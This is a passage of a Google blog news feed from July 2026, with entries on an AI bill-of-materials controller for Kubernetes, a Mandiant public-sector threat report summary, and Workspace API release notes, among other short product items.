&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you’d like to learn more about Nexus SDV platform, AAOS SDV and Bigtable contact us today at &lt;/span&gt;&lt;a href="mailto:nexus-sdv@google.com"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;nexus-sdv@google.com&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AAOS SDV is available in the &lt;/span&gt;&lt;a href="https://source.android.com/docs/automotive/start/releases" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Android Automotive 26Q2 release&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Nexus SDV documentation can be found &lt;/span&gt;&lt;a href="http://docs.nexus-sdv.io/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Go &lt;/span&gt;&lt;a href="https://cloud.google.com/bigtable?e=48754805#time-series-and-iot"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to learn more about Bigtable as the time-series database for automotive telemetry.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Thinking about your connected vehicle security, check this out, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/shift-into-high-gear-with-agents-securing-the-software-defined-vehicle"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Shift into high gear with agents: Securing the software-defined vehicle&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/databases/nexus-sdv-uses-bigtable-android-automotive-for-agentic-vehicles" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-13T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/introducing-k8s-aibom-on-gke-for-automated-ai-bills-of-materials</id>
    <title>Securing the AI supply chain on GKE: Introducing k8s-aibom for automated AI BOMs</title>
    <updated>2026-07-13T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;How should your security team manage shadow AI? Workloads deployed by developers without formal registration can often evade traditional security scanners, because organizations are reluctant to slow down development and compromise stability by demanding privileged Daemonsets, kernel-level access, and manual pod-spec edits.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To break this deadlock, today we are open-sourcing &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/k8s-aibom" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;k8s-aibom&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This lightweight, unprivileged Kubernetes controller continuously monitors the cluster API and container environments to automatically detect running AI runtimes (like vLLM and Triton) and generate standard &lt;/span&gt;&lt;a href="https://cyclonedx.org/capabilities/mlbom/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CycloneDX Machine Learning Bill of Materials&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (ML-BOMs). &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By providing automated, audit-grade visibility directly from runtime execution — regardless of whether the workload was formally registered — k8s-aibom can help teams safely move AI projects from pilot to production without developer integration friction.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The architecture of zero friction&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;k8s-aibom is designed from the ground up to respect both the CISO mandate for total visibility and the SRE mandate for cluster stability. It deploys as a single, unprivileged Deployment in the k8s-aibom-system namespace. It involves zero developer friction — no sidecars, no eBPF kernel modules, no privileged DaemonSets, and no modifications to existing developer pod specifications.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="k8s-aibom" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/k8s-aibom.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;k8s-aibom watches for AI workloads and produces BOMs.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The discovery pipeline executes through four clear stages:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Scrape cluster workloads&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The controller continuously monitors KServe resources, Deployments, StatefulSets, DaemonSets, and Jobs across the cluster.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Identify AI stacks&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Advanced pattern matching inspects container images, environment variables, and command-line arguments to detect serving runtimes (vLLM, Triton Inference Server, TGI, Ollama), autonomous agent frameworks (LangChain, AutoGen, CrewAI), vector databases and RAG stores (Milvus, Qdrant, pgvector), as well as distributed training jobs and evaluation harnesses.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Generate standard manifests&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The controller compiles the discovered artifacts into formal OWASP CycloneDX 1.6 Machine Learning Bill of Materials (ML-BOM) documents.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Export to sinks&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The controller attaches the resulting ML-BOM directly to the custom resource status (status.bomDocument) of an in-cluster AIBOM Custom Resource (CR) and routes it to optional external sinks, including Google Cloud Storage buckets and external webhook endpoints.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Application teams do not need to modify their pod specifications, inject sidecar containers, or alter their continuous integration and continuous delivery (CI/CD) pipelines. Furthermore, k8s-aibom treats the Kubernetes cluster state as a pure functional input: Identical cluster inputs produce byte-identical ML-BOM documents. This deterministic property makes k8s-aibom an ideal fit for GitOps workflows, enabling site-reliability engineers (SREs) to perform exact diffs and trigger precise change-detection alerts when AI dependencies drift.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Where existing AIBOM tooling falls short&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Many AI BOM solutions offer build-time scanners producing BOMs from artifacts at rest. These tools help you track the code that was intended to be deployed. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Commercial AI security platforms extend the picture with cloud-native posture management, but typically through external scanning shaped around vendor-specific data models. Few, if any, of these tools help compliance reviewers, security operations (SecOps) teams, and platform engineers understand what is running right now, what is it connected to, and how can we verify those assertions. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We purpose-built k8s-aibom to bridge that gap. It produces BOMs from live cluster observation rather than artifact scanning, emits standards-conformant CycloneDX 1.6 ML-BOMs that integrate with the broader OWASP and Open Source Security Foundation (OpenSSF) supply-chain ecosystem rather than vendor-proprietary formats, and runs as an unprivileged controller on any conformant Kubernetes cluster — making it complementary to existing build-time and posture-management tooling rather than a replacement for either.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The Confidence Model: Separating intent from inference&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For compliance auditors and SecOps engineers, raw telemetry is often noise. Standard monitoring tools indicate that a container is running, but can’t prove whether an AI model was explicitly configured by a platform engineer or dynamically pulled by an autonomous script at runtime. k8s-aibom solves this ambiguity through its deterministic Confidence Model, categorizing discovered assets into distinct tiers:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Declared&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Explicitly defined by the customer or developer in the workload configuration (For example, explicitly passed container arguments such as --model meta-llama/Llama-2-7b.) A “declared” confidence detection represents clear human intent.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Inferred&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Derived autonomously by the controller's pattern-matching engine through deep inspection of container images, environment variables, and execution profiles. (For example, identifying ^vllm/.* container signatures.)&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Unresolved&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Applied to workloads where an active AI presence is detected, but exact model parameters, weights, and versions can’t be deterministically established. An “unresolved” confidence detection immediately flags the workload for targeted security review.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This structured taxonomy allows compliance reviewers to instantly separate explicit engineering intent from machine inference, establishing an unassailable chain of trust during audits.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Immutability and least privilege: Building an audit-grade security model&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Auditors remain deeply skeptical of standard observability telemetry because logs and metrics can be modified, dropped, and tampered with by compromised nodes or elevated administrators. k8s-aibom establishes an audit-grade evidence trail built on strict least-privilege isolation and data immutability.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The controller operates under a dedicated Kubernetes service account bound to a minimal Identity and Access Management (IAM) Workload Identity. It acts as the sole identity authorized to write BOM records to external storage sinks, requiring only roles/storage.objectCreator permissions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To satisfy the most stringent audit and evidentiary standards, the Google Cloud Storage external sink implementation enforces DoesNotExist preconditions on object creation. Once an ML-BOM is written to the Cloud Storage bucket, the object becomes cryptographically immutable. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It can’t be silently overwritten, modified, or retroactively tampered with by compromised cluster actors or rogue workloads. SecOps teams gain absolute assurance that the historical audit log presented to regulators represents an unalterable record of cluster execution.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Accelerating governance readiness: Mapping to global regulatory frameworks&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By automating the generation of standardized CycloneDX 1.6 ML-BOMs, k8s-aibom directly bridges the gap between low-level Kubernetes runtime state and high-level governance frameworks. It unblocks stalled GKE AI deployments by providing the foundational empirical data essential to major global standards:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;EU AI Act&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Designed to help organizations align with &lt;/span&gt;&lt;a href="https://ai-act-service-desk.ec.europa.eu/en/ai-act/article-12" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Article 12&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (automated logging and record-keeping for continuous traceability) and &lt;/span&gt;&lt;a href="https://ai-act-service-desk.ec.europa.eu/en/ai-act/article-50" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Article 50&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (transparency obligations for AI systems). By automatically cataloging serving runtimes and agent stacks, the tool helps simplify the gathering of technical evidence that may be needed during compliance audits.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;NIST AI Risk Management Framework (AI RMF)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Provides continuous, empirical asset visibility that can help support the Govern, Map, Measure, and Manage functions, helping shift compliance workflows from purely manual checks toward more automated asset inventory tracking.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;ISO/IEC 42001&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;:Supports compliance efforts for AI management system asset discovery and tracking, reducing the reliance on manual spreadsheets or periodic snapshot audits for inventory validation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Getting started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It’s rare that a technical solution like k8s-aibom can help mitigate the &lt;/span&gt;&lt;a href="https://cloud.google.com/transform/these-4-ai-governance-tips-help-counter-shadow-agents"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;multi-faceted problem of shadow AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, impacting CISOs, governance, risk, and compliance teams, SecOps teams, platform engineers, and developers.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To learn more by inspecting the controller, review the CRD definitions, and contribute to the open-source k8s-aibom project, please visit the &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/k8s-aibom" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;k8s-aibom GitHub Repository&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/introducing-k8s-aibom-on-gke-for-automated-ai-bills-of-materials" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-13T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products/ads-commerce/video-campaign-groups</id>
    <title>Optimize your reach and frequency across campaigns with video campaign groups.</title>
    <updated>2026-07-13T16:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/RxF_jpg__V2AgfZ0.max-600x600.format-webp.webp" /&gt;Coordinate reach and frequency across campaigns while still maintaining individual campaign settings.</content>
    <link href="https://blog.google/products/ads-commerce/video-campaign-groups" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-13T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/public-sector/key-findings-from-the-2026-public-sector-m-trends-report-and-beyond</id>
    <title>Key findings from the 2026 Public Sector M-Trends report and beyond</title>
    <updated>2026-07-13T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph"&gt;&lt;p&gt;In 2026, the public sector is no longer defending a traditional perimeter. Instead, they are defending a complex web of interconnected trust relationships against adversaries that now operate at machine speed. We recently published the &lt;a href="https://cloud.google.com/resources/content/mtrends-2026-public-sector?e=48754805"&gt;2026 Public Sector Threat Landscape: M-Trends and Beyond&lt;/a&gt; report, which distills more than 500,000 hours of frontline incident investigations conducted by &lt;a href="https://cloud.google.com/security/mandiant?e=48754805"&gt;Mandiant&lt;/a&gt; in 2025, specifically tailored to the mission-critical needs of public sector leaders.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;Key findings from the report and what they mean for the public sector&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;The most alarming trend in this year’s M-Trends data is the &lt;i&gt;22-second hand-off:&lt;/i&gt; the median time between an initial access broker establishing a foothold and the hand-off to a ransomware operator. This extreme compression of the attack cycle renders traditional, human-speed triage obsolete. When an infection on a municipal workstation can move to an encrypted network before a human analyst can even open a ticket, the strategic mandate for resilience must pivot toward machine-speed defense.&lt;/p&gt;&lt;p&gt;Additionally, the report uncovered several emerging "boundaries of trust" that adversaries are systematically exploiting:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;The persistence paradox:&lt;/b&gt; State-sponsored espionage actors are pursuing multi-year persistence, with some remaining undetected for over five years. This "persistence paradox" directly challenges standard 90-day telemetry retention policies, often leaving agencies unable to quantify the full impact of a breach.&lt;/li&gt;&lt;li&gt;&lt;b&gt;The virtualization stack:&lt;/b&gt; Attackers are moving "down the stack" to target the virtualization management plane. Techniques like "snapshot mounting" allow attackers to bypass guest-level security tools, creating snapshots of domain controllers to steal databases offline.&lt;/li&gt;&lt;li&gt;&lt;b&gt;The SaaS domino effect:&lt;/b&gt; At the state and local levels, the reliance on third-party cloud tools has turned integrations into threat vectors. Exploiting non-human identities (NHIs) like service accounts and OAuth tokens allows a single compromise to trigger a chain reaction across an entire agency network.&lt;/li&gt;&lt;li&gt;&lt;b&gt;The vishing surge:&lt;/b&gt; Voice phishing (vishing) has surged to 11% of global infections. These highly effective social engineering attacks target government help desks to reset passwords or enroll unauthorized devices. This proves that the ‘human element’—the administrative trust placed in help desk staff and IT administrators—is now a primary vector for establishing initial access.&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;&lt;b&gt;A mandate for continuous verification&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;Looking ahead, resilience in the public sector will require more than a compliance checklist; it demands a cultural pivot to continuous verification—a security doctrine where trust is never assumed and must be constantly re-validated. Success is no longer just defined by the absence of a breach, but also by an agency’s ability to remain operational while under active attack. At Google, we provide the technical architecture to make continuous verification a reality through three core capabilities.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Identity as the new perimeter:&lt;/b&gt; Through &lt;a href="https://chromeenterprise.google/products/chrome-enterprise-premium/" target="_blank"&gt;Chrome Enterprise Premium&lt;/a&gt;, we replace traditional VPNs with context-aware access. We verify the user’s identity and the security posture of their device for every single application request, ensuring that access is only granted under the right conditions.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Agentic defense:&lt;/b&gt; We enable agencies to ingest and analyze massive telemetry datasets in real-time using &lt;a href="https://cloud.google.com/security/products/security-operations"&gt;Google Security Operations&lt;/a&gt;, which includes threat-centric case management, interactive, context-rich alert graphing, and automatic stitching together of entities. This allows for the "Machine-Speed" detection required to spot an adversary within the 22-second hand-off window, turning manual triage into automated, continuous monitoring. To stay ahead of these rapid shifts, this operational stack is directly infused with &lt;a href="https://cloud.google.com/security/products/threat-intelligence?e=48754805"&gt;Google Threat Intelligence&lt;/a&gt;, exposing global actor infrastructure and matching internal telemetry with Mandiant’s frontline incident insights in real time.&lt;/p&gt;&lt;p&gt;At Google Cloud Next ‘26, we announced &lt;a href="https://cloud.google.com/blog/products/identity-security/next26-redefining-security-for-the-ai-era-with-google-cloud-and-wiz?e=48754805"&gt;three new AI-powered autonomous agents within Google Security Operations&lt;/a&gt;: a Threat Hunting agent to proactively unearth hidden attack patterns, a Detection Engineering agent to automatically close telemetry coverage gaps, and a Third-Party Context agent to seamlessly enrich analyst workflows.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Hardened infrastructure:&lt;/b&gt; By moving "down the stack" with &lt;a href="https://docs.cloud.google.com/security-command-center/docs/security-command-center-overview"&gt;Security Command Center&lt;/a&gt; and leveraging our strategic partnership with &lt;a href="https://cloud.google.com/blog/products/identity-security/google-completes-acquisition-of-wiz?e=48754805"&gt;Wiz&lt;/a&gt;, we offer deep visibility into the virtualization and cloud layers. This allows agencies to continuously verify the integrity of their hypervisors and cloud configurations, automatically detecting unauthorized "Snapshot Mounting" or configuration drifts that adversaries exploit for persistence. By hardening the administrative fabric—including identity and virtualization—and modernizing log retention to close the visibility gap, government leaders can move from a state of reactive triage to a future of context-aware resilience.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;Google security in action&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;Google’s security technology comes to life across the public sector, where agencies are successfully shifting from manual triage to agentic defense, and accelerating their security transformation. The &lt;a href="https://cloud.google.com/customers/pascosheriffsoffice?e=48754805"&gt;Pasco Sheriff’s Office&lt;/a&gt; transformed its security and operations, unifying siloed tools with Google Security Operations to boost efficiency, improve community safety, and champion secure AI for law enforcement. Meanwhile, the &lt;a href="https://www.youtube.com/watch?v=N2l0NUlPlqk&amp;amp;list=PLBgogxgQVM9srW0GIORrq3IU9GcPp9q17&amp;amp;index=2" target="_blank"&gt;State of Connecticut&lt;/a&gt; moved from a fragmented operating model to a unified, proactive security posture using Google Security Operations to reduce forensic investigation times from months to mere hours and create a secure-by-design digital infrastructure for the future of public service.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;Secure your future&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;Download the &lt;a href="https://cloud.google.com/resources/content/mtrends-2026-public-sector?e=48754805"&gt;2026 Public Sector Threat Landscape: M-Trends and Beyond&lt;/a&gt; report to explore the data and strategic recommendations for the latest insights and trends and what they mean for the public sector. Catch the replay of our &lt;a href="https://cloudonair.withgoogle.com/events/gemini-for-government-the-blueprint-for-mission-impact?utm_source=cgc-blog&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY26-Q2-northam-PUB39634-onlineevent-er-q2-26-g4g-webinar&amp;amp;utm_content=kd_bp&amp;amp;utm_term=-" target="_blank"&gt;Gemini for Government webinar&lt;/a&gt; to dive deeper into securing and governing an agent.&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/public-sector/key-findings-from-the-2026-public-sector-m-trends-report-and-beyond" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-13T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://deepmind.google/blog/empowering-indias-next-generation-of-innovators-with-atl-saathi</id>
    <title>Empowering India’s next generation of innovators with ATL Saathi</title>
    <updated>2026-07-13T12:37:28+00:00</updated>
    <content type="html">Google and AIM launched ATL Saathi, a Gemini-powered AI tool empowering Indian educators in robotics labs.</content>
    <link href="https://deepmind.google/blog/empowering-indias-next-generation-of-innovators-with-atl-saathi" rel="alternate"/>
    <category term="Google DeepMind"/>
    <published>2026-07-13T12:37:28+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/waze/waze-updates-gemini-motorcycle-mode</id>
    <title>Waze rolls out new customization features and more Gemini updates</title>
    <updated>2026-07-13T09:00:00+00:00</updated>
    <content type="html">Waze motorcycle mode</content>
    <link href="https://blog.google/waze/waze-updates-gemini-motorcycle-mode" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-13T09:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/workspace/release-notes#July_13_2026</id>
    <title>Workspace Release Notes — July 13, 2026</title>
    <updated>2026-07-13T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Chat API&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally Available&lt;/strong&gt;: Subscriptions to user read state updates in Google Chat are now generally available.&lt;/p&gt;
&lt;p&gt;You can use the Google Workspace Events API to subscribe to user read state updates in Google Chat. The following event types are supported:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;google.workspace.chat.spaceReadState.v1.updated&lt;/code&gt;: A user's space read state is updated.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;google.workspace.chat.threadReadState.v1.updated&lt;/code&gt;: A user's thread read state is updated.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;google.workspace.chat.spaceReadState.v1.batchUpdated&lt;/code&gt;: Multiple space read states are updated for the subscribed user.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;google.workspace.chat.threadReadState.v1.batchUpdated&lt;/code&gt;: Multiple thread read states are updated for the subscribed user.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This feature requires the &lt;code&gt;https://www.googleapis.com/auth/chat.users.readstate&lt;/code&gt; or &lt;code&gt;https://www.googleapis.com/auth/chat.users.readstate.readonly&lt;/code&gt; authorization scope.&lt;/p&gt;
&lt;p&gt;To learn more, see &lt;a href="https://developers.google.com/workspace/events/guides/events-chat"&gt;Subscribe to Google Chat events&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google Sheets API&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href="https://developers.google.com/workspace/preview"&gt;Developer Preview&lt;/a&gt;&lt;/strong&gt;: The &lt;a href="https://modelcontextprotocol.io/"&gt;Model Context Protocol (MCP)&lt;/a&gt; server for Google Sheets is now available in developer preview. MCP is an open protocol that enables seamless integration between AI applications and your spreadsheets. By configuring the Sheets MCP server, you enable AI agents to securely interact with your spreadsheets and take actions, such as reading cell values or updating formulas.&lt;/p&gt;
&lt;p&gt;To get started with the Sheets MCP server, see the following documentation:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://developers.google.com/workspace/sheets/api/guides/configure-mcp-server"&gt;Set up the Sheets MCP server&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://developers.google.com/workspace/sheets/api/reference/mcp"&gt;Sheets MCP tool reference&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To find more available MCP servers, see &lt;a href="https://developers.google.com/workspace/guides/configure-mcp-servers"&gt;Model Context Protocol (MCP) servers in Google Workspace&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google Slides API&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href="https://developers.google.com/workspace/preview"&gt;Developer Preview&lt;/a&gt;&lt;/strong&gt;: The &lt;a href="https://modelcontextprotocol.io/"&gt;Model Context Protocol (MCP)&lt;/a&gt; server for Google Slides is now available in developer preview. MCP is an open protocol that enables seamless integration between AI applications and your presentations. By configuring the Slides MCP server, you enable AI agents to securely interact with your presentations and take actions, such as reading slide content or updating layouts.&lt;/p&gt;
&lt;p&gt;To get started with the Slides MCP server, see the following documentation:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://developers.google.com/workspace/slides/api/guides/configure-mcp-server"&gt;Set up the Slides MCP server&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://developers.google.com/workspace/slides/api/reference/mcp"&gt;Slides MCP tool reference&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To find more available MCP servers, see &lt;a href="https://developers.google.com/workspace/guides/configure-mcp-servers"&gt;Model Context Protocol (MCP) servers in Google Workspace&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google Workspace Events API&lt;/h2&gt;
&lt;strong class="release-note-product-version-title"&gt;&lt;/strong&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally Available&lt;/strong&gt;: Subscriptions to user read state updates in Google Chat are now generally available.&lt;/p&gt;
&lt;p&gt;You can use the Google Workspace Events API to subscribe to user read state updates in Google Chat. The following event types are supported:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;google.workspace.chat.spaceReadState.v1.updated&lt;/code&gt;: A user's space read state is updated.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;google.workspace.chat.threadReadState.v1.updated&lt;/code&gt;: A user's thread read state is updated.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;google.workspace.chat.spaceReadState.v1.batchUpdated&lt;/code&gt;: Multiple space read states are updated for the subscribed user.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;google.workspace.chat.threadReadState.v1.batchUpdated&lt;/code&gt;: Multiple thread read states are updated for the subscribed user.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This feature requires the &lt;code&gt;https://www.googleapis.com/auth/chat.users.readstate&lt;/code&gt; or &lt;code&gt;https://www.googleapis.com/auth/chat.users.readstate.readonly&lt;/code&gt; authorization scope.&lt;/p&gt;
&lt;p&gt;To learn more, see &lt;a href="https://developers.google.com/workspace/events/guides/events-chat"&gt;Subscribe to Google Chat events&lt;/a&gt;.&lt;/p&gt;</content>
